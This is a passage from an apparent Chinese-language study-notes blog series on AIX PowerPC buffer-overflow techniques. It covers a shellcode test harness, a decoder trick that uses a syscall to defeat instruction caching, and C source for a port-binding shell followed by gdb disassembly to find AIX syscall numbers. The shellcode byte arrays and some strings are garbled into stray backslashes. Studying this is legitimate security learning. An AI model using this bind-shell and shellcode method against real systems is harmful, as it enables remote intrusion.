AIX PowerPC体系结构及其溢出技术学习笔记(6)

2019-03-23 13:04

char shellcode[] = // decoder

\\\

\

\\

\\

\\

\\

\

\

\\

// real shellcode

\\\\\\

\\

\\;

// Test harness for the buffer above: wraps the address of `shellcode` in a
// two-word array {address, 0} and calls through it as if it were a function.
int main() {

// NOTE(review): the {entry, 0} pair looks like an AIX PowerPC function
// descriptor (entry address, TOC pointer) — confirm against the target ABI.
// (int)shellcode only round-trips the pointer on a 32-bit build; presumably
// that is the target here.
int jump[2]={(int)shellcode,0}; ((*(void (*)())jump)()); }

-bash-2.05b$ ./test_3 $ id

uid=202(san) gid=1(staff) $ exit -bash-2.05b$

只需在真实的shellcode前面插入一个系统调用(这里使用的是sync的调用号,用其它调用号也可以)。系统调用返回后会跳到lr寄存器所保存的地址继续执行,此时执行的指令不再来自缓存。

七、远程溢出调试

lsd在UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes这份文档里提供了AIX的一系列远程shellcode,由于AIX的系统调用中断号在各系统版本里都是不同的,所以我们需要把它找出来。

一个简单的监听端口的shellcode用C语言表示大致如下:

-bash-2.05b$ cat bind.c #include #include #include #include

// soc: listening socket returned by socket() in main(); cli: connected
// socket returned by accept(); i: loop index for the fd 2..0 close/dup loop.
int soc,cli,i;

// Local address handed to bind(); main() fills sin_family, sin_addr and
// sin_port before the call.
// NOTE(review): sin_port is stored as 0x1234 without htons(); that only
// equals network byte order on a big-endian host (PowerPC) — confirm.
struct sockaddr_in serv_addr;

int main() {

serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=0x1234; soc=socket(2,1,0);

bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,5); cli=accept(soc,0,0);

for (i=2;i>=0;i--) { close(i);

kfcntl(cli, 0, i); }

execve(\}

AIX的dup2函数实际上最终调用的还是kfcntl系统调用。编译后,用gdb调试:

-bash-2.05b$ gdb bind GNU gdb 6.1

Copyright 2004 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type \

There is absolutely no warranty for GDB. Type \This GDB was configured as \(gdb) disas main

Dump of assembler code for function main: 0x10000534 : mflr r0

0x10000538 : stw r31,-4(r1) 0x1000053c : stw r0,8(r1) 0x10000540 : stwu r1,-72(r1) 0x10000544 : mr r31,r1 0x10000548 : lwz r9,108(r2) 0x1000054c : li r0,2 0x10000550 : stb r0,1(r9) 0x10000554 : lwz r9,108(r2) 0x10000558 : li r0,0 0x1000055c : stw r0,4(r9) 0x10000560 : lwz r9,108(r2) 0x10000564 : li r0,4660 0x10000568 : sth r0,2(r9) 0x1000056c : li r3,2 0x10000570 : li r4,1 0x10000574 : li r5,0

0x10000578 : bl 0x1000734c 0x1000057c : lwz r2,20(r1) 0x10000580 : mr r0,r3 0x10000584 : lwz r9,112(r2) 0x10000588 : stw r0,0(r9) 0x1000058c : lwz r9,112(r2) 0x10000590 : lwz r3,0(r9) 0x10000594 : lwz r4,108(r2) 0x10000598 : li r5,16

0x1000059c : bl 0x10007448 0x100005a0 : lwz r2,20(r1) 0x100005a4 : lwz r9,112(r2) 0x100005a8 : lwz r3,0(r9) 0x100005ac : li r4,5

0x100005b0 : bl 0x1000746c 0x100005b4 : lwz r2,20(r1) 0x100005b8 : lwz r9,112(r2) 0x100005bc : lwz r3,0(r9) 0x100005c0 : li r4,0 0x100005c4 : li r5,0

0x100005c8 : bl 0x10007394 0x100005cc : lwz r2,20(r1) 0x100005d0 : mr r0,r3 0x100005d4 : lwz r9,116(r2) 0x100005d8 : stw r0,0(r9) 0x100005dc : lwz r9,120(r2) 0x100005e0 : li r0,2 0x100005e4 : stw r0,0(r9) 0x100005e8 : lwz r9,120(r2) 0x100005ec : lwz r0,0(r9) 0x100005f0 : cmpwi r0,0

0x100005f4 : bge- 0x100005fc 0x100005f8 : b 0x10000640 0x100005fc : lwz r9,120(r2) 0x10000600 : lwz r3,0(r9)

0x10000604 : bl 0x100074b4 0x10000608 : lwz r2,20(r1) 0x1000060c : lwz r9,116(r2) 0x10000610 : lwz r11,120(r2) 0x10000614 : lwz r3,0(r9) 0x10000618 : li r4,0 0x1000061c : lwz r5,0(r11)

0x10000620 : bl 0x100074d8 0x10000624 : lwz r2,20(r1) 0x10000628 : lwz r11,120(r2) 0x1000062c : lwz r9,120(r2) 0x10000630 : lwz r9,0(r9) 0x10000634 : addi r0,r9,-1 0x10000638 : stw r0,0(r11)

0x1000063c : b 0x100005e8 0x10000640 : lwz r3,124(r2) 0x10000644 : li r4,0 0x10000648 : li r5,0

0x1000064c : bl 0x10007328 0x10000650 : lwz r2,20(r1) 0x10000654 : mr r3,r0 0x10000658 : lwz r1,0(r1) 0x1000065c : lwz r0,8(r1) 0x10000660 : mtlr r0

0x10000664 : lwz r31,-4(r1) 0x10000668 : blr 0x1000066c : .long 0x0 0x10000670 : .long 0x2061 0x10000674 : lwz r0,1(r1)

0x10000678 : .long 0x138 0x1000067c : .long 0x46d61 0x10000680 : xori r14,r11,7936 End of assembler dump.

gdb能够显示各函数的入口地址,我们在这些入口地址分别下断点:

(gdb) b *0x1000734c Breakpoint 1 at 0x1000734c (gdb) b *0x10007448 Breakpoint 2 at 0x10007448 (gdb) b *0x1000746c Breakpoint 3 at 0x1000746c (gdb) b *0x10007394 Breakpoint 4 at 0x10007394 (gdb) b *0x100074b4 Breakpoint 5 at 0x100074b4 (gdb) b *0x100074d8 Breakpoint 6 at 0x100074d8 (gdb) b *0x10007328 Breakpoint 7 at 0x10007328

下完断点后运行,gdb会在各函数入口处停下,这时就可以查看其系统调用号。如果该函数只是包装函数(wrapper),用si一直单步执行下去,就能看到它最终实际调用的系统调用中断号。 (gdb) r

Starting program: /home/san/bind

Breakpoint 1, 0x1000734c in socket () (gdb) x/8i $pc

0x1000734c : lwz r12,4(r2) 0x10007350 : stw r2,20(r1) 0x10007354 : lwz r0,0(r12) 0x10007358 : lwz r2,4(r12) 0x1000735c : mtctr r0 0x10007360 : bctr 0x10007364 : .long 0x0 0x10007368 : .long 0xc8000 (gdb) si

0x10007350 in socket () (gdb)

0x10007354 in socket () (gdb)

0x10007358 in socket ()

